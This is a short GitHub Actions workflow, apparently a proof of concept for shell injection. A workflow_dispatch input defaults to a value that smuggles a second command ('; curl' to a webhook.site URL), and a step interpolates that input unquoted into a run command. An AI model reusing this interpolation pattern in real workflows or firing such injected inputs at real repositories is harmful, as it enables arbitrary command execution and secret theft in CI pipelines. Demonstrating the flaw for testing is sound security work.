name: PoC Shell Injection

on:
  workflow_dispatch:
    inputs:
      datasource:
        description: "Malicious input"
        required: true
        default: "; curl https://webhook.site/caf4a700-0087-4ac1-9ff6-bee753baf1b4"

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - run: echo "${{ github.event.inputs.datasource }}"
